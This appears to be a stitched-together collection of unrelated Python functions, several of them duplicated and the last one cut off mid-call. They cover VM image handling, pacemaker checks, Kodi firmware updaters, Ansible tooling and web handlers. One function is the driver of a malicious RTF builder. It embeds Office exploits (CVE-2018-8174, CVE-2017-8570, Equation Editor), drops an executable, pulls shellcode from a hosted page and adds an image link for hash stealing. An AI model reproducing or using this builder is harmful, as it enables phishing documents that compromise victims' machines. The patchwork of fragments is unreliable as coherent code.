def delete(self, snapshot: str=None, **kwargs: dict): if snapshot: utils.pend("delete snapshot %s" % kwargs['name[:snapshot]']) if snapshot not in self.snapshots: utils.fail("%s: snapshot does not exist" % kwargs['name[:snapshot]']) exit(1) try: os.unlink('%s.%s' % (self.path_raw, snapshot)) utils.ok() except PermissionError: utils.fail("Permission denied") exit(1) else: if not os.path.isdir(self.path): utils.fail("%s: VM does not exist" % self.name) exit(1) if not utils.ask("Delete VM %s?" % self.name, default=False): exit(1) utils.pend("delete %s" % self.name) try: shutil.rmtree(self.path) utils.ok() except PermissionError: utils.fail("Permission denied") exit(1)
def main(test_filter=None): if not test_filter: test_filter = "*" try: test_suite = list(TestParser.read_all(test_filter)) except (UnknownFieldError, RequiredFieldError) as error: print(fail(str(error))) exit(1) total_tests = 0 for fname, suite_tests in test_suite: total_tests += len(suite_tests) failed_tests = [] print( ok("[==========]") + " Running %d tests from %d test cases.\n" % (total_tests, len(test_suite))) start_time = time.time() skipped_tests = [] for fname, tests in test_suite: print(ok("[----------]") + " %d tests from %s" % (len(tests), fname)) for test in tests: status = Utils.run_test(test) if Utils.skipped(status): skipped_tests.append((fname, test, status)) if Utils.failed(status): failed_tests.append("%s.%s" % (fname, test.name)) # TODO(mmarchini) elapsed time per test suite and per test (like gtest) print(ok("[----------]") + " %d tests from %s\n" % (len(tests), fname)) elapsed = time.time() - start_time total_tests -= len(skipped_tests) # TODO(mmarchini) pretty print time print( ok("[==========]") + " %d tests from %d test cases ran. (%s total)" % (total_tests, len(test_suite), elapsed)) print( ok("[ PASSED ]") + " %d tests." % (total_tests - len(failed_tests))) if skipped_tests: print( warn("[ SKIP ]") + " %d tests, listed below:" % len(skipped_tests)) for test_suite, test, status in skipped_tests: print( warn("[ SKIP ]") + " %s.%s (%s)" % (test_suite, test.name, Utils.skip_reason(test, status))) if failed_tests: print( fail("[ FAILED ]") + " %d tests, listed below:" % len(failed_tests)) for failed_test in failed_tests: print(fail("[ FAILED ]") + " %s" % failed_test) if failed_tests: exit(1)
def _pacemaker_host_check(): parser = argparse.ArgumentParser( description='Check amqp connection of an OpenStack service.') parser.add_argument('-r', dest='pacemaker_resource', help='pacemaker resource', required=True) parser.add_argument('-s', dest='script', required=False, help='Script') parser.add_argument('--crm', dest='crm', required=False, help='Use "crm_mon -1" instead of "pcs status"', action='store_true', default=False) options = parser.parse_args() if options.script and (not os.path.isfile(options.script) or not os.access(options.script, os.X_OK)): utils.critical('the script %s could not be read' % options.script) local_hostname = subprocess.check_output(['hostname', '-s']).strip() try: if options.crm: output = subprocess.check_output(['crm_mon', '-1']) else: output = subprocess.check_output(['pcs', 'status']) except subprocess.CalledProcessError as e: utils.critical('pcs status with status %s: %s' % e.returncode, e.output) except OSError: utils.critical('pcs not found') for line in re.sub("\n +", " ", output).splitlines(): line = " ".join(line.strip().split()) # Sanitize separator if not line: continue resource, remaining = line.split(None, 1) if resource == options.pacemaker_resource: agent, __, remaining = remaining.partition(' ') if ' ' in remaining: status, __, current_hostname = remaining.partition(' ') else: status, current_hostname = remaining, '' if status != "Started": utils.critical("pacemaker resource %s is not started (%s)" % (resource, status)) if current_hostname != local_hostname: utils.ok("pacemaker resource %s doesn't run on this node " "(but on %s)" % (resource, current_hostname)) _ok_run_script(options) elif resource == 'Clone': _check_resource_in_host(remaining, 'Started:', options, local_hostname) elif resource == 'Master/Slave': _check_resource_in_host(remaining, 'Masters:', options, local_hostname) else: utils.critical('pacemaker resource %s not found' % options.pacemaker_resource)
def async_send_command(command, host, port, timeout): pid = os.getpid() if os.fork() != 0: return # Avoid the pesky KeyboardInterrupts in the child signal.signal(signal.SIGINT, signal.SIG_IGN) command_deadline = datetime.now() + timedelta(seconds=timeout) utils.pend("sending command %s to %s:%d" % (command.args, host, port)) while True: try: os.kill(pid, 0) # check if parent is still here except OSError: break now = datetime.now() if now < command_deadline: try: send_command(command, host, port, TIMEOUT_CMD_SEND) except CommandError as e: utils.pend(None, msg="%s, retrying for %d more seconds" % (e, (command_deadline - now).seconds)) else: utils.ok("command %s successfully sent" % command.args) exit(0) else: utils.abort("command timeout") break time.sleep(1) exit(1)
def _pacemaker_host_check(): parser = argparse.ArgumentParser(description="Check amqp connection of an OpenStack service.") parser.add_argument("-r", dest="pacemaker_resource", help="pacemaker resource", required=True) parser.add_argument("-s", dest="script", required=True, help="Script") options = parser.parse_args() local_hostname = subprocess.check_output(["hostname", "-s"]).strip() try: output = subprocess.check_output(["pcs", "status"]) except subprocess.CalledProcessError as e: utils.critical("pcs status with status %s: %s" % e.returncode, e.output) except OSError: utils.critical("pcs not found") for line in output.splitlines(): line = " ".join(line.strip().split()) # Sanitize separator if not line: continue resource, remaining = line.split(None, 1) if resource == options.pacemaker_resource: agent, __, remaining = remaining.partition(" ") if " " in remaining: status, __, current_hostname = remaining.partition(" ") else: status, current_hostname = remaining, "" if status != "Started": utils.critical("pacemaker resource %s is not started (%s)" % (resource, status)) if current_hostname != local_hostname: utils.ok("pacemaker resource %s doesn't on this node " "(but on %s)" % (resource, current_hostname)) script = shlex.split(options.script) os.execvp(script[0], script) else: utils.critical("pacemaker resource %s not found" % options.pacemaker_resource)
def vm_init(path: str): utils.pend("initialise VM directory: %s" % path) try: os.mkdir(path) except OSError as e: utils.fail(e.strip()) exit(1) utils.ok()
def _pacemaker_host_check(): parser = argparse.ArgumentParser( description='Check amqp connection of an OpenStack service.') parser.add_argument('-r', dest='pacemaker_resource', help='pacemaker resource', required=True) parser.add_argument('-s', dest='script', required=False, help='Script') parser.add_argument('--crm', dest='crm', required=False, help='Use "crm_mon -1" instead of "pcs status"', action='store_true', default=False) options = parser.parse_args() if options.script and (not os.path.isfile(options.script) or not os.access(options.script, os.X_OK)): utils.critical('the script %s could not be read' % options.script) local_hostname = subprocess.check_output(['hostname', '-s']).strip() try: if options.crm : output = subprocess.check_output(['crm_mon', '-1']) else: output = subprocess.check_output(['pcs', 'status']) except subprocess.CalledProcessError as e: utils.critical('pcs status with status %s: %s' % e.returncode, e.output) except OSError: utils.critical('pcs not found') for line in re.sub("\n +", " ", output).splitlines(): line = " ".join(line.strip().split()) # Sanitize separator if not line: continue resource, remaining = line.split(None, 1) if resource == options.pacemaker_resource: agent, __, remaining = remaining.partition(' ') if ' ' in remaining: status, __, current_hostname = remaining.partition(' ') else: status, current_hostname = remaining, '' if status != "Started": utils.critical("pacemaker resource %s is not started (%s)" % (resource, status)) if current_hostname != local_hostname: utils.ok("pacemaker resource %s doesn't run on this node " "(but on %s)" % (resource, current_hostname)) _ok_run_script(options) elif resource == 'Clone' : _check_resource_in_host(remaining, 'Started:', options, local_hostname) elif resource == 'Master/Slave': _check_resource_in_host(remaining, 'Masters:', options, local_hostname) else: utils.critical('pacemaker resource %s not found' % options.pacemaker_resource)
def create(self, size: str, force: bool, **kwargs: dict): self.initialise(force) utils.pend("create %s%sB image" % (size, ('i', '')[size[-1] in '0123456789'])) utils.execute(['%s/qemu-img' % self.path_executable, 'create', '-f', 'raw', self.path_raw, size], msg="execute qemu-img") self.size = size utils.ok()
def import_raw(self, raw: str, force: bool): if not os.path.exists(raw): utils.fail("%s: file not found" % raw) exit(1) self.initialise(force) utils.pend("copy disk image") utils.execute(['cp', raw, self.path_raw]) utils.ok()
def loadLibrary(self): path = 'unknown' try: path = utils.getFlircLibrary() self.lib = ctypes.cdll.LoadLibrary(path) except Exception, e: utils.log('***** loadLibary Failed *****') utils.log('library path = %s' % path) utils.log('err = %s' % str(e)) utils.ok(1, 5, 0, 6) self.lib = None
def verify(): # verify that all ansible files are encrypted for filename in find_matching_files(DECRYPTED_TAG): utils.error('Found decrypted file', "'" + filename + "'.", "Run 'ansible-playkit vault encrypt' before commit") # verify that all keys are encrypted unencrypted_keys = [os.path.basename(f) for f in get_unencrypted_keys()] if len(unencrypted_keys) > 0: utils.error("Found unencrypted keys: ", ', '.join(unencrypted_keys)) utils.ok('All files encrypted. Ok.') sys.exit(0)
def _ok_run_script(options): '''If there is a script to run it is executed otherwise a default message. Argument: options (Object) -- main program arguments ''' if options.script: script = shlex.split(options.script) os.execvp(script[0], script) else: utils.ok("pacemaker resource %s is running" % options.pacemaker_resource)
def checkForUpdate(silent = 1): if silent == '2' or silent=='3': utils.rebootCommand(silent) return if silent == '4': try: username = utils.getSetting('username') password = utils.getSetting('password') tinyosid = getHwAddr('wlan0') tinyoshw = utils.getSetting('device') url = 'http://tinyhtpc.co.nz/downloads/tinyos-list.php' cj = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) login_data = urllib.urlencode({'username' : username, 'password' : password}) opener.open(url, login_data) post_id = urllib.urlencode({'tinyosid' : tinyosid, 'tinyoshw' : tinyoshw}) resp = opener.open(url, post_id) response = resp.read() #print response except: return [] performManualUpdate(response, silent) return utils.saveOta() utils.saveHW() utils.saveID() silent = int(silent) == 1 if silent and utils.getSetting('autoUpdate') == 'false': return allDone(silent) response = getResponse() isValid = len(response) > 0 if not isValid: if not silent: utils.ok(1, 12, 13) return allDone(silent) if updateAvailable(response['Version']): utils.log('Update Available') performUpdate(response, silent) elif not silent: if downloaded(): checkPrevious() else: utils.ok(1, 22, 13) allDone(silent)
def execute(args, cmd_line): # Informative: ip = utils.get_default_ip() if args['headless']: utils.info("VNC: port %d (connect with `$vncclient %s:%d`)" % (args['vnc_port'], ip, args['vnc_display'])) utils.info("Qemu monitor: port %d (connect with `{nc,telnet} %s %d)" % (args['monitor_port'], ip, args['monitor_port'])) if args['mode'] == 'sym': utils.info("Experiment name: %s" % args['expname']) if args['script'] or args['command']: utils.info("Watchdog: port %d" % args['command_port']) utils.debug("Command line:\n%s" % ' '.join(cmd_line)) if args['dry_run']: exit(1) environ = dict(os.environ) if args['mode'] == 'sym': environ['LUA_PATH'] = ';'.join(['%s/?.lua' % args['config_root'], environ.get('LUA_PATH', '')]) utils.debug("LUA_PATH=%s" % environ['LUA_PATH']) # each experiment gets its own directory: try: utils.pend("Creating experiment directory %s" % args['exppath']) os.makedirs(args['exppath']) utils.ok() except FileExistsError: utils.fail("Experiment %s already exists. Please choose another name." % args['expname']) exit(1) if args['timeout']: kill_me_later(args['timeout']) obj = None if args['script']: module_file, test = args['script'] with open(module_file, 'r') as f: code = f.read() obj = Script(code=code, test=test) if args['command']: obj = Command.from_cmd_args(args['command'], args['env_var'] or []) if obj: async_send_command(obj, 'localhost', args['command_port'], TIMEOUT_CMD) # drop `s2e-last` symlink somewhere where it does not get in the way: os.chdir(utils.CHEFROOT_EXPDATA) os.execvpe(cmd_line[0], cmd_line, environ)
def checkFlirc(self): try: if self.flirc.lib == None: utils.ok(1, 5, 0, 6) self.close(utils.CLOSED) return self.isConnected = self.flirc.checkConnect() self.getControl(self.style + CONNECTED).setVisible(self.isConnected) self.getControl(FIRMWARE).setLabel(utils.getFirmwareString(self.flirc.version)) self.timerOn() except: pass
def export(self, targz: str, **kwargs: dict): if not os.path.isdir(self.path): utils.fail("%s: VM does not exist" % self.name) exit(1) if not targz: targz = '%s.tar.gz' % self.name targz = os.path.abspath(targz) utils.info("exporting to %s" % targz) tar = '%s/%s' % (self.path, os.path.basename(os.path.splitext(targz)[0])) if os.path.exists(targz): utils.fail("%s: package already exists" % targz) exit(1) os.chdir(self.path) # create intermediate files in VM's path utils.pend("package disk image") utils.execute(['tar', '-cSf', tar, os.path.basename(self.path_raw)]) utils.ok() for s in self.snapshots: utils.pend("package snapshot: %s" % s) local_snapshot = '%s.%s' % (os.path.basename(self.path_raw), s) utils.execute(['tar', '-rf', tar, local_snapshot]) utils.ok() utils.pend("compress package", msg="may take some time") utils.execute(['gzip', '-c', tar], outfile=targz) utils.ok() utils.pend("clean up") os.unlink(tar) utils.ok() self.scan_snapshots()
def checkFlirc(self): try: if self.flirc.lib == None: utils.ok(1, 5, 0, 6) self.close(utils.CLOSED) return self.isConnected = self.flirc.checkConnect() self.getControl(self.style + CONNECTED).setVisible( self.isConnected) self.getControl(FIRMWARE).setLabel( utils.getFirmwareString(self.flirc.version)) self.timerOn() except: pass
async def upimg(request): # 判断用户是否具有上传权限 if request.headers.get('token') != TOKEN: return fail('您没有使用本服务的权限') # 判断参数是否正确 if not request.files and not request.files.get('file'): return fail('error args') image = request.files.get('file').body # 判断文件是否支持 imageSuffix = getSuffix(bytes2hex(image)) if 'error' in imageSuffix: return fail(imageSuffix) # 组织图片存储路径 m1 = hashlib.md5() m1.update(image) md5Name = m1.hexdigest() saveDir = baseDir + md5Name[0:2] + '/' savePath = saveDir + md5Name[2:] + '.' + imageSuffix resPath = '/' + md5Name[0:2] + '/' + md5Name[2:] + '.' + imageSuffix # 如果文件夹不存在,就创建文件夹 if not os.path.exists(saveDir): os.makedirs(saveDir) # 将文件写入到硬盘 tempFile = open(savePath, 'wb') tempFile.write(image) tempFile.close() # 给客户端返回结果 return ok({"path": resPath})
def lambda_handler(event, context): body = event["body"] if event["body"] else None if not body: return bad_request( {'message': 'Event request does not contain body object'}) if 'action' not in body: return bad_request({'message': 'Body does not contain \'action\' key'}) if body["action"] not in ALLOWED_ACTIONS: return bad_request({ 'message': 'Body does not contain a valid action. Valid actions are: ' + ','.join(ALLOWED_ACTIONS) }) if body["action"] == 'check-user-permissions': if ACL_MANAGEMENT_VALIDATOR.validate(body): # get the permission of the user user_permission = get_permissions_by_user_id(body["user_id"]) if body["permission"] in user_permission: return ok({'authorized': 'True'}) else: # else, return bad request return forbidden() else: return bad_request(ACL_MANAGEMENT_VALIDATOR.errors)
def get_site_settings_values(): sql = f''' select site_visibility, title, fontsize, selfurl, coloraccent, isdarkmode, description, copyright, websiteurl, brandmail, brandlogourl, faviconurl, appiconurl from settings.site_settings ''' msg = {'body': {'action': 'run', 'queries': [sql]}} method, response = db_handler(msg) if method == 'ok': response_dict = response[0][1:-1] return ok(json.loads(response_dict)) else: return internal_server_error()
def run(args): parser = argparse.ArgumentParser(prog='ansible-playkit play', description='deploy') parser.add_argument('inventory', help='inventory name') parser.add_argument('playbook', help='playbook name') parser.add_argument('tags', nargs='*', help='Playbook tags which should be used') parser.add_argument('--vault-password', dest='vault_password', required=False, help='Ansible Vault password') parser.add_argument('--ansible-opts', dest='ansible_opts', required=False, help='Additional Ansible Playbook options') args = parser.parse_args(args) inventory_path = os.path.join(INVENTORIES_PATH, args.inventory) if os.path.exists(inventory_path): utils.ok('Using inventory', inventory_path) else: utils.error('Inventory not found', inventory_path) key_path = os.path.join(KEYS_PATH, '{}.pem'.format(args.inventory)) if os.path.exists(key_path): utils.ok('Using encrypted key', key_path) else: utils.error('Encrypted key not found', key_path) playbook_filename = args.playbook + '.yml' r = 0 key_path_copy = key_path + '.copy' try: if args.vault_password is not None: save_plain_vault_password(args.vault_password) install_ansible_requirements() shutil.copyfile(key_path, key_path_copy) vault.run_ansible_vault('decrypt', [key_path]) r = run_playbook(inventory_path, playbook_filename, key_path, args.tags, args.ansible_opts) except Exception as e: utils.error(e.message) finally: try: os.remove(vault.VAULT_PLAIN_PASSWORD_FILENAME) except OSError: pass if not vault.file_matches(key_path, vault.ENCRYPTED_TAG) and os.path.exists(key_path_copy): shutil.move(key_path_copy, key_path) sys.exit(r)
def run(self): utils.new_line() utils.info('Parse and group DICOM directory') self._parser.parse_acquisitions() utils.new_line() utils.info('Sort and set up acquisitions') self._parser.sort_acquisitions() #utils.new_line() #utils.ok('Acquisitions of interest:') #for _ in self._parser.caught: utils.info(_) utils.new_line() utils.warning('Acquisitions excluded:') for _ in self._parser._excluded: utils.info(_) utils.new_line() utils.info('Create YAML file for dcm2niibatch') for acq in self._parser.acquisitions: self._batch.add(acq) self._batch.write() utils.new_line() utils.ok('Batch file:') self._batch.show() if self._yes: launchBatch = True else: msg = "Do you want to launch dcm2niibatch ?" launchBatch = utils.query_yes_no(msg) if launchBatch: self._batch.launch() for acq in self._parser.acquisitions: acq.update_json() else: utils.new_line() utils.ok("To launch dcm2niibatch later:") utils.info("cd {}".format(self._codeDir)) utils.info(self._batch.command) return 0
def performUpdate(response, silent): try: version = response['Version'] link = response['Link'] md5 = response['MD5'] except: return path = getDownloadPath() if utils.generateMD5(path) != md5: if (not silent) and (not utils.yesno(1, 10, 11)): return dp = None if not silent: dp = utils.progress(1, 14, 15) hash = 0 count = 0 nTries = 3 if not silent: nTries = 1 while (count < nTries) and (hash != md5): count += 1 try: download(link, path, dp) hash = utils.generateMD5(path) except Exception, e: utils.deleteFile(path) if str(e) == 'Canceled': return if hash != md5: utils.unflagUpdate() utils.deleteFile(path) utils.setSetting('dVersion', '0.0.0') if not silent: utils.ok(1, 24, 13) return
def performUpdate(response, silent): try: version = response['Version'] link = response['Link'] md5 = response['MD5'] except: return path = getDownloadPath() if utils.generateMD5(path) != md5: if (not silent) and (not utils.yesno(1, 10, 11)): return dp = None if not silent: dp = utils.progress(1, 14, 15) hash = 0 count = 0 nTries = 3 if not silent: nTries = 1 while (count < nTries) and (hash != md5): count += 1 try: download(link,path,version,dp) hash = utils.generateMD5(path) except Exception, e: utils.deleteFile(path) if str(e) == 'Canceled': return if hash != md5: utils.unflagUpdate() utils.deleteFile(path) utils.setSetting('dVersion', '0.0.0') if not silent: utils.ok(1, 24, 13) return
def clone(self, clone: str, force: bool, **kwargs: dict): if not os.path.isdir(self.path): utils.fail("%s: VM does not exist" % self.name) exit(1) if self.name == clone: utils.fail("%s: please specify a different name" % clone) exit(2) new = VM(clone) new.initialise(force) # http://bugs.python.org/issue10016 utils.pend("copy disk image", msg="may take some time") utils.execute(['cp', self.path_raw, new.path_raw]) utils.ok() for s in self.snapshots: utils.pend("copy snapshot: %s" % s) utils.execute(['cp', '%s.%s' % (self.path_raw, s), new.path]) utils.ok() new.scan_snapshots()
def checkForUpdate(silent = 1): if silent == '2' or silent=='3': utils.rebootCommand(silent) return if silent == '4': try: url = 'http://cloud.thelittleblackbox.co.uk/manual.{0}.php'.format(utils.getAmlogicCpuType()) response = urllib2.urlopen(url).read() except: return [] performManualUpdate(response, silent) return utils.saveOta() silent = int(silent) == 1 if silent and utils.getSetting('autoUpdate') == 'false': return allDone(silent) response = getResponse() isValid = len(response) > 0 if not isValid: if not silent: utils.ok(1, 12, 13) return allDone(silent) if updateAvailable(response['Version']): utils.log('Update Available') performUpdate(response, silent) elif not silent: if downloaded(): checkPrevious() else: utils.ok(1, 22, 13) allDone(silent)
def _check_resource_in_host(remaining, match_word, options, local_hostname): '''Searches for resource and a local_hostname on the rest of the line It checks if the resource is the second or third word on the line and search for the host on the running nodes Arguments: :param remaining: (str)-- the rest of the line :param match_word: (str)-- 'Started:'-->Clone or 'Master'-->Master/Slave :param options: (object)-- main program arguments :param local_hostname: -- localhost ''' engine = re.compile('Set: ('+options.pacemaker_resource+' \[.*\]|.* \[' +options.pacemaker_resource+'\]) '+match_word+' (\[.*?\])') patterns = re.search(engine, remaining) if patterns is not None: host_list = patterns.group(2).split()[1:-1] for host in host_list: if host == local_hostname: _ok_run_script(options) utils.ok("pacemaker resource %s doesn't on this node " "(but on %s)" % (resource, patterns.group(2)))
def checkForUpdate(silent=1): if silent == '2' or silent == '3': utils.rebootCommand(silent) return if silent == '4': try: url = 'http://navixhardware.com/manual.m3.php' response = urllib2.urlopen(url).read() except: return [] performManualUpdate(response, silent) return utils.saveOta() silent = int(silent) == 1 if silent and utils.getSetting('autoUpdate') == 'false': return allDone(silent) response = getResponse() isValid = len(response) > 0 if not isValid: if not silent: utils.ok(1, 12, 13) return allDone(silent) if updateAvailable(response['Version']): utils.log('Update Available') performUpdate(response, silent) elif not silent: if downloaded(): checkPrevious() else: utils.ok(1, 22, 13) allDone(silent)
def initialise(self, force: bool): utils.pend("initialise VM") try: os.mkdir(self.path) utils.ok() except PermissionError as pe: utils.fail(pe) exit(1) except OSError as ose: msg = "%s already exists" % self.name if force: utils.info("%s, overwriting" % msg) try: shutil.rmtree(self.path) # FIXME what if PWD == self.path ? os.mkdir(self.path) except PermissionError as pe: utils.fail(pe) exit(1) except OSError as ose2: utils.fail(ose) exit(1) else: utils.info(msg) exit(1)
def patch_site_settings_values(**kwargs): body = kwargs.get('body') email = kwargs.get('email') settings = { 'site_visibility': body.get('site_visibility', ''), 'title': body.get('title', ''), 'fontsize': body.get('fontsize', ''), 'coloraccent': body.get('coloraccent', ''), 'isdarkmode': body.get('isdarkmode', ''), 'description': body.get('description', ''), 'copyright': body.get('copyright', ''), 'websiteurl': body.get('websiteurl', ''), 'brandmail': body.get('brandmail', ''), 'brandlogourl': body.get('brandlogourl', ''), 'faviconurl': body.get('faviconurl', ''), 'appiconurl': body.get('appiconurl', '') } schema_validation = Validator(PATCH_ADMIN_SETTINGS_SCHEMA) remove_empty_values_of_dict(settings) resp = None if schema_validation.validate(settings): query = dynamic_update_query( settings, 'settings.site_settings', '', email) print(query) msg = { 'body': { 'action': 'run', 'queries': [query] } } method, result = db_handler(msg) print(result) if method == 'ok': resp = settings else: return bad_request(schema_validation.errors) return ok(resp)
def POST(self, username, mail, password): user = User(username, mail, password) exist = user.exist() # User already exist, so we couldn't add it another time if exist == OK: return httpError(205) valid = user.validate() if valid == INVALID_MAIL: return httpError(201) elif valid == INSECURE_PASSWORD: return httpError(202) state = user.insert_db() if state == UNKNOWN_ERROR: return httpError(203) return ok()
def execute_queries(queries): """ This function fetches content from MySQL RDS instance """ conn = dbconnect() result = [] for query in queries: with conn.cursor(cursor_factory=RealDictCursor) as cur: try: cur.execute(query) rows = cur.fetchall() result.append(json.dumps(rows, indent=2)) except Exception as e: print(e) conn.close() return ok(result)
def _import(self, targz: str, raw: bool, force: bool, **kwargs: dict): if raw: self.import_raw(targz, force) return if not os.path.exists(targz): utils.fail("%s: file not found" % targz) exit(1) targz = os.path.abspath(targz) tar = '%s/%s' % (self.path, os.path.basename(os.path.splitext(targz)[0])) self.initialise(force) os.chdir(self.path) # create intermediate files in VM's path utils.pend("decompress package", msg="may take some time") utils.execute(['gzip', '-cd', targz], outfile=tar) utils.ok() utils.pend("scan package") _, file_list, _ = utils.execute(['tar', '-tf', tar], iowrap=True) utils.ok() file_list = file_list.split() for f in file_list: if f == os.path.basename(self.path_raw): utils.pend("extract disk image") else: result = re.search( '(?<=%s\.).+' % os.path.basename(self.path_raw), f ) if not result: utils.warn("misformatted file: %s (skipping)" % f) continue snapshotname = result.group(0) utils.pend("extract snapshot: %s" % snapshotname) utils.execute(['tar', '-x', f, '-f', tar]) utils.ok() utils.pend("clean up") os.unlink(tar) utils.ok()
def POST(self): try: json = cherrypy.request.json login = json['auth']['login'] password = json['auth']['password'] door_id = json['id'] except: return httpError(200) user = User(login, password=password) exist = user.exist() if exist == USER_NOT_EXIST: return httpError(204) door = Door(door_id) exist = door.exist() if exist == DOOR_NOT_EXIST: return httpError(301) # User don't have permissions on this door if door.userid != user.userid: return httpError(207) return ok()
def GET(self, login, password): some = User(login, password=password) exist = some.exist() if exist == USER_NOT_EXIST: return httpError(204) return ok()
def performManualUpdate(response, silent): try: import xbmcgui path = getDownloadPath() select_name=['Cancel'] select_url=['Cancel'] for i in json.loads(response): cVersion = utils.getSetting('cVersion') if not cVersion in i['Version']: select_name.append(i['Version']) select_url.append(i['Link']+'*'+i['Version']+'*'+i['MD5']) link = select_url[xbmcgui.Dialog().select('Your Current Firmware '+ cVersion , select_name)] if 'Cancel' in link: return url = link.split('*')[0] version = link.split('*')[1] md5 = link.split('*')[2] if utils.generateMD5(path) != md5: if (not silent) and (not utils.yesno(1, 11, 0)): return dp = None if silent: dp = utils.progress(1, 14, 15) hash = 0 count = 0 nTries = 3 if not silent: nTries = 1 while (count < nTries) and (hash != md5): count += 1 try: download(url,path,version,dp) hash = utils.generateMD5(path) except Exception, e: utils.deleteFile(path) if str(e) == 'Canceled': return if hash != md5: utils.unflagUpdate() utils.deleteFile(path) utils.setSetting('dVersion', '0.0.0') if not silent: utils.ok(1, 24, 13) return utils.setSetting('dVersion', version) if not utils.okReboot(1, 23, 16, 18, delay = 15): return reboot()
def main(): parser = argparse.ArgumentParser() parser.add_argument('-D', '--debug', action='store_true', help='enable debug') parser.add_argument('-l', '--list', action='store_true', help='list exploits and additions') parser.add_argument('-u', '--use', action='append', help='add exploit (see --list)') parser.add_argument('--use-cve', action='append', help='add exploit (by CVE)') parser.add_argument('--exe-name', help='name for dropped EXE file (for exploits equation and composite)') parser.add_argument('--template', default=utils.basedir(default_rtf), help='RTF template to add exploit to (default: {})'.format(default_rtf)) parser.add_argument('--fake-path', default=default_fakepath, help='fake path for packaged files (default: {})'.format(default_fakepath)) parser.add_argument('-o', '--out', help='RTF output') king = parser.add_argument_group('king exploit', 'King exploit (CVE-2018-8174) options') king.add_argument('--king-shellcode', default=utils.basedir(default_king_shellcode), help='shellcode for CVE-2018-8174 (default: {})'.format(default_king_shellcode)) king.add_argument('--king-url', help='URL where HTML will be hosted for king exploit (max: 39 chars)') king.add_argument('--king-html-out', help='output file for king HTML') composite = parser.add_argument_group('composite exploit', 'Composite moniker exploit (CVE-2017-8570) options') composite.add_argument('--composite-sct', help='use this SCT file instead of generating one') additions = parser.add_argument_group('additions', 'Additional things to add to the RTF') additions.add_argument('--image-track', help='include an image from this URL, for tracking and hash stealing') additions.add_argument('-p', '--package', action='append', help='files to add as packages. will by dropped in temp (append fake name with colon)') args = parser.parse_args() # -D/--debug utils.enable_debug = args.debug # -l/--list if args.list: print('exploits (use with --use):') for exploit, cve in exploit_to_cve.items(): print(' - {} ({})'.format(exploit, cve)) print() print('additions:') print(' - image tracking and hash stealing (use with --image-track)') print(' - embed file as package to be dropped in %temp% (use with --package)') sys.exit() # read original rtf with open(args.template, 'r') as fp: rtf = fp.read() # remove last } rtf = rtf.rstrip() if rtf[-1] != '}': bye('} must be the last character of the rtf') rtf = rtf[:-1] rtf += '\n' * 3 # use these exploits used = [] if args.use: # -u/--use for item in args.use: for exploit in item.split(','): exploit = exploit.lower() if exploit == 'all': # use all exploits used += supported_exploits else: # check to make sure it exists if exploit not in supported_exploits: bye('unknown exploit: {}'.format(exploit)) used.append(exploit) else: # defaults used = default_exploits # --use-cve if args.use_cve: for item in args.use_cve: for cve in item.split(','): cve = cve.lower() # check to make sure it exists if cve not in cve_to_exploit: bye('unknown CVE: {}'.format(cve)) used.append(cve_to_exploit[cve]) # sort the exploits by reliability used = list(set(used)) used = sorted(used, key=lambda x: supported_exploits.index(x)) # embed packages packages = None if args.package: packages = parse_packages(args.package) for package, fakename in packages: package = rtf_package.Package(package, fakename=fakename, fakepath=args.fake_path) rtf += package.build_package() # track with image (--image-track) if args.image_track: yes('adding image track: {}'.format(args.image_track)) rtf += generate_image(args.image_track) # generate exploits for exploit in used: yes('adding exploit {} ({})'.format(exploit, exploit_to_cve[exploit])) if exploit == 'king': # check args if not args.king_url: bye('specify --king-url') if not args.king_html_out: bye('specify --king-html-out') # if using the default shellcode, make sure it'll work if args.king_shellcode == utils.basedir(default_king_shellcode): if (args.exe_name and args.exe_name != default_king_exe_name) or \ not check_packages(packages, default_king_exe_name): bye('the default king shellcode expects an executable named {} to be packaged'.format(default_king_exe_name)) # make rtf part rtf_part = exploits.king.generate_rtf(args.king_url) if not rtf_part: bye('king url too long: {}'.format(args.king_url)) rtf += rtf_part # read shellcode with open(args.king_shellcode, 'rb') as fp: shellcode = fp.read() # make html part html = exploits.king.generate_html(shellcode) # output html ok('writing king html to {}'.format(args.king_html_out)) ok('rtf will retrive king exploit from {}'.format(args.king_url)) with open(args.king_html_out, 'w+') as fp: fp.write(html) elif exploit in ['equation1', 'equation2']: if not check_packages(packages, args.exe_name): bye('provide a file to execute with -p/--package (or change file with --exe-name)'.format(args.exe_name)) # exe name is --exe-name or the package if there's only one exe_name = args.exe_name if args.exe_name else packages[0][1] if exploit == 'equation2': rtf += exploits.equation.generate_rtf1(exe_name) elif exploit == 'equation2': rtf += exploits.equation.generate_rtf2(exe_name) elif exploit == 'composite': if not check_packages(packages, args.exe_name): bye('provide a file to execute with -p/--package (or change file with --exe-name)'.format(args.exe_name)) # exe name is --exe-name or the package if there's only one exe_name = args.exe_name if args.exe_name else packages[0][1] # add SCT if needed with tempfile.NamedTemporaryFile() as temp: sct_name = utils.randstr(15, 15) + '.sct' if args.composite_sct: # use user SCT package = rtf_package.Package(args.composite_sct, fakename=sct_name, fakepath=args.fake_path) rtf += package.build_package() else: # build an SCT sct = exploits.composite.generate_sct(exe_name) temp.write(sct.encode()) temp.flush() package = rtf_package.Package(temp.name, fakename=sct_name, fakepath=args.fake_path) rtf += package.build_package() rtf += exploits.composite.generate_rtf(sct_name) else: raise RuntimeError('unknown exploit') # add back an enclosing } rtf += '}\n' # write new rtf if args.out: ok('writing rtf to {}'.format(args.out)) with open(args.out, 'w+') as fp: fp.write(rtf) else: bye('specify output RTF file with --out')
def performManualUpdate(response, silent): try: import xbmcgui path = getDownloadPath() select_name = ['Cancel'] select_url = ['Cancel'] for i in json.loads(response): cVersion = utils.getSetting('cVersion') if not cVersion in i['Version']: select_name.append(i['Version']) select_url.append(i['Link'] + '*' + i['Version'] + '*' + i['MD5']) link = select_url[xbmcgui.Dialog().select( 'Your Current Firmware ' + cVersion, select_name)] if 'Cancel' in link: return url = link.split('*')[0] version = link.split('*')[1] md5 = link.split('*')[2] if utils.generateMD5(path) != md5: if (not silent) and (not utils.yesno(1, 11, 0)): return dp = None if silent: dp = utils.progress(1, 14, 15) hash = 0 count = 0 nTries = 3 if not silent: nTries = 1 while (count < nTries) and (hash != md5): count += 1 try: download(url, path, version, dp) hash = utils.generateMD5(path) except Exception, e: utils.deleteFile(path) if str(e) == 'Canceled': return if hash != md5: utils.unflagUpdate() utils.deleteFile(path) utils.setSetting('dVersion', '0.0.0') if not silent: utils.ok(1, 24, 13) return utils.setSetting('dVersion', version) if not utils.okReboot(1, 23, 16, 18, 